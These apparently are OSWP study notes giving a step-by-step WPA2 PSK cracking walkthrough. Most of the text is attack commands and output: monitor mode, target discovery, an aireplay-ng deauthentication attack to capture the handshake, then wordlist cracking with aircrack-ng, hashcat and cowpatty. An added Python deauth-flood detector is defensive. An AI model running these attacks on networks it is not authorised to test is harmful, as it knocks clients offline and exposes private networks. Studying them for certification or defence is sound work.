WPA/WPA2

Steps to crack a WPA/WPA2 pre-shared key (PSK). We first need to capture a WPA 4-way handshake between the access point and a client.

1. Monitor mode

First, use airmon-ng to list processes that could interfere with the card (NetworkManager, wpa_supplicant, ...) and kill them:

sudo airmon-ng check
sudo airmon-ng check kill

Next, we enable monitor mode, either on any channel or locked to a specific channel. Depending on the driver the interface may be renamed (for example to wlan0mon); use whatever name airmon-ng reports in the following steps:

sudo airmon-ng start wlan0
sudo airmon-ng start wlan0 <channel_id>

2. Finding target

We will now find the bssid (MAC) and essid (SSID) of our target:

sudo airodump-ng wlan0

Example output:

We found our target F0:A7:31:46:69:71 and see it's using WPA2 PSK auth. We can also see it's on channel 1.

3. Dumping & getting handshake

sudo airodump-ng -c 1 -w wpa2 --bssid F0:A7:31:46:69:71 wlan0

-c 1: lock the card to channel 1, the channel the target is on

-w wpa2: write the capture to files prefixed wpa2 (here wpa2-01.cap)

--bssid F0:A7:31:46:69:71: only capture traffic for the target AP

wlan0: our monitor interface

We will now have to wait for a client to connect to the network, or force a reconnection with a deauthentication attack. We can see one station (client), 8C:EC:7B:0F:63:24, is connected.

4. Re-authentication (deauth) attack

We use ‘aireplay-ng’ to inject deauthentication frames (-0, one burst) addressed to the station. The client is kicked off the network and reconnects, and that re-authentication produces the 4-way handshake that airodump-ng is waiting to capture.

┌──(kali㉿kali)-[~/offsec/oswp]
└─$ sudo aireplay-ng -0 1 -a F0:A7:31:46:69:71 -c 8C:EC:7B:0F:63:24 wlan0
13:38:20  Waiting for beacon frame (BSSID: F0:A7:31:46:69:71) on channel 1
13:38:21  Sending 64 directed DeAuth (code 7). STMAC: [8C:EC:7B:0F:63:24] [ 0| 0 ACKs]

After that, the airodump-ng window shows a "WPA handshake: X" status in its header line, where X is the target BSSID:

The handshake is now stored in the .cap file (wpa2-01.cap). We can now use aircrack-ng to crack the PSK.
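From the defender's side, the burst of 64 reason-code-7 deauth frames that aireplay-ng reported above is exactly what a wireless IDS rule looks for. As an added example (not part of the original notes or of any tool on this page), this Python script flags deauthentication floods in a constructed frame log; the record format, the threshold and the window size are assumptions chosen for the demo:

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (not a real capture): "HH:MM:SS.mmm subtype reason src dst".
# Record 1 is a beacon; the 64-frame burst mirrors the aireplay-ng output above;
# the last record is a single, legitimate deauth (reason 3: station leaving).
AP, STA = "F0:A7:31:46:69:71", "8C:EC:7B:0F:63:24"
SAMPLE_LOG = ["13:38:20.101 beacon - %s ff:ff:ff:ff:ff:ff" % AP]
SAMPLE_LOG += ["13:38:21.%03d deauth 7 %s %s" % (i * 5, AP, STA) for i in range(64)]
SAMPLE_LOG += ["13:38:25.300 deauth 3 %s %s" % (STA, AP)]

LINE_RE = re.compile(r"^(\S+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_line(line):
    """Parse one record into (seconds_since_midnight, subtype, reason, src, dst)."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, subtype, reason, src, dst = m.groups()
    t = datetime.strptime(ts, "%H:%M:%S.%f")
    secs = t.hour * 3600 + t.minute * 60 + t.second + t.microsecond / 1e6
    return secs, subtype, None if reason == "-" else int(reason), src.upper(), dst.upper()


def detect_deauth_floods(lines, threshold=10, window=2.0):
    """Flag (src, dst) pairs that emit >= threshold deauth frames inside a sliding
    window of `window` seconds. Returns {(src, dst): peak_count_in_window}.
    A lone deauth (normal roaming / station leaving) never trips the rule."""
    recent = defaultdict(deque)  # (src, dst) -> timestamps inside the window
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec[1] != "deauth":
            continue
        t, _, _reason, src, dst = rec
        q = recent[(src, dst)]
        q.append(t)
        while q and t - q[0] > window:  # expire frames older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts[(src, dst)] = max(alerts.get((src, dst), 0), len(q))
    return alerts


if __name__ == "__main__":
    for (src, dst), n in detect_deauth_floods(SAMPLE_LOG).items():
        print("deauth flood: %s -> %s, %d frames in window" % (src, dst, n))
```

On a real sensor the same logic would run over frames decoded from monitor-mode captures; enabling 802.11w (protected management frames) on the AP is the mitigation that makes forged deauth frames ineffective in the first place.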

5. Cracking

Now we run ‘aircrack-ng’ against the capture we gathered earlier, giving it the wordlist (-w), the network name (-e) and the target BSSID (-b):

aircrack-ng -w list.txt -e OSWP -b F0:A7:31:46:69:71 wpa2-01.cap

With hashcat

Convert the capture to hashcat hash mode 22000 (WPA-PBKDF2-PMKID+EAPOL) with hcxpcapngtool; -E additionally writes the ESSIDs seen in the capture to a file named wordlist:

hcxpcapngtool -o hash.hc22000 -E wordlist wpa2-01.cap

Crack it with the same wordlist:

hashcat -m 22000 hash.hc22000 list.txt

With cowpatty

First, precompute the PMK table for the target SSID (-s) from the wordlist (-f) into a database file (-d):

genpmk -f list.txt -d oswphashes -s OSWP

Then run cowpatty against the capture with that table:

cowpatty -r wpa2-01.cap -d oswphashes -s OSWP
